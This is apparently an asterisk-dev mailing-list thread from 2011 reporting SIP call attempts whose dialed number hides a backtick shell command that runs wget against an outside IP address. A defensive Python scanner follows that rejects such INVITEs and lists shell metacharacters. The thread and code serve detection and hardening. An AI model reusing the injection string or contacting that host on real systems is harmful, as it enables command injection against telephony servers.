[asterisk-dev] A new kind of SIP attack ?

Jeff LaCoursiere jeff at sunfone.com
Mon Sep 12 07:28:48 CDT 2011



On Mon, 12 Sep 2011, Tom Browning wrote:

> On Mon, Sep 12, 2011 at 4:47 AM, Olle E. Johansson <oej at edvina.net> wrote:
>>
>> 12 sep 2011 kl. 10:39 skrev Pavel Troller:
>>
>>> Hi!
>>>  Since yesterday, I can see strange "call attempts" coming to my
>>> switches over SIP to destinations like this:
>>>  00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`
>>>  I tried to wget the file manually and it was successful, but it was
>>> empty (zero size).
>>>  I'm just informing about something which may be a new kind of hacking
>>> attempt. I hope that Asterisk doesn't perform backtick expansion during
>>> processing of the called number, but I'm writing it there to be sure
>>> that a developer's eye will look at this and confirm it.
>>>  With regards,
>>>    Pavel Troller
>>>
>>
>> Just wanted to add that the best current practise we added to the README files earlier apply here as well. If your dialplan ONLY has numeric extensions, filter out all the rest on incoming calls.
>>
>> /O
>
>
> I saw (and reported on asterisk-users) the same URI attempts last
> night on a server configured to be a "honeypot" of sorts (Asterisk 10
> that accepts all calls via UDP 5060 and dumps them into a single
> Asterisk 10 conference bridge :-) ... works great)
>
> FWIW, the call attempts must be coming from a real SIP server as I
> found two of the calls sitting in my conference bridge!
>
> I would bet that this shell injection scan has its roots in a
> discovery that a common SIP server configuration or framework is
> subject to shell injection and this is how they are going to find those
> servers for further attack via shell injection.
>
> Tom
>

Would be interesting to let your honeypot accept the request and perform 
the wget, and see what happens next...

j
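The filter Olle recommends (accept only numeric dialed strings when the dialplan has only numeric extensions) is easy to check outside Asterisk as well, for instance on a honeypot like Tom's or in a log scanner. The following is an added example, not code from the thread or from the Asterisk project: it parses the Request-URI of a raw SIP INVITE, percent-decodes the user part, and rejects anything that is not a plain number, naming any shell metacharacters it finds. The two INVITEs are constructed samples (the `pbx.example` host and `192.0.2.x` addresses are placeholders); the first reproduces the dialed string Pavel quoted, percent-encoded the way a SIP client would send it. Treating a literal `\x20` in the input as an escaped space is an assumption about how the capture or log rendered non-printables.

```python
"""Detect shell-metacharacter probes in SIP INVITE Request-URIs."""
import re
from urllib.parse import unquote

# Characters that should never appear in a dialed number; the probe in the
# thread relies on the backtick.
SHELL_META = set("`$;|&<>(){}'\"\\")

# A dialplan that only has numeric extensions should only accept these
# (digits, * and #, optionally a leading +).
NUMERIC_EXTEN = re.compile(r"^\+?[0-9*#]+$")


def decode_user_part(user):
    """Undo %XX percent-encoding and literal \\xNN escapes (assumed rendering of
    non-printables in the capture/log) so the dialed string is inspected the way
    the dialplan would see it."""
    user = unquote(user)
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), user)


def request_uri_user(raw_invite):
    """Return the decoded user part of the Request-URI from a raw SIP request,
    or None if the request line is not an INVITE with a sip:/sips: URI."""
    request_line = raw_invite.split("\r\n", 1)[0]
    m = re.match(r"INVITE\s+sips?:([^@\s]*)@", request_line)
    if not m:
        return None
    return decode_user_part(m.group(1))


def classify_dialed_number(user):
    """Apply the 'numeric extensions only' filter. Returns (verdict, detail)."""
    if NUMERIC_EXTEN.match(user):
        return ("accept", None)
    bad = sorted(set(user) & SHELL_META)
    if bad:
        return ("reject", "shell metacharacters: " + "".join(bad))
    return ("reject", "non-numeric dialed string")


def scan_invites(raw_invites):
    """Run the filter over a batch of raw INVITEs; returns a list of
    (decoded user part, reason) for everything that was rejected."""
    findings = []
    for raw in raw_invites:
        user = request_uri_user(raw)
        if user is None:
            continue
        verdict, detail = classify_dialed_number(user)
        if verdict == "reject":
            findings.append((user, detail))
    return findings


# Constructed samples (not captures from the thread). The first reproduces the
# dialed string Pavel quoted, percent-encoded as a SIP client would send it.
PROBE_INVITE = (
    "INVITE sip:00123456789000%60wget%20-O%20/dev/null%20http://91.223.89.94/V.php%60@pbx.example SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-1\r\n"
    "From: <sip:100@192.0.2.10>;tag=1\r\n"
    "To: <sip:00123456789000@pbx.example>\r\n"
    "Call-ID: probe-1@192.0.2.10\r\n"
    "CSeq: 1 INVITE\r\n\r\n"
)
BENIGN_INVITE = (
    "INVITE sip:00123456789000@pbx.example SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.11:5060;branch=z9hG4bK-2\r\n"
    "From: <sip:200@192.0.2.11>;tag=2\r\n"
    "To: <sip:00123456789000@pbx.example>\r\n"
    "Call-ID: call-2@192.0.2.11\r\n"
    "CSeq: 1 INVITE\r\n\r\n"
)

if __name__ == "__main__":
    for user, detail in scan_invites([PROBE_INVITE, BENIGN_INVITE]):
        print("REJECT %r: %s" % (user, detail))
```

Inside Asterisk itself the same policy is expressed in the dialplan: match incoming calls only against numeric patterns such as `_X.`, or strip everything but digits with the FILTER() dialplan function before the dialed string reaches anything else.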

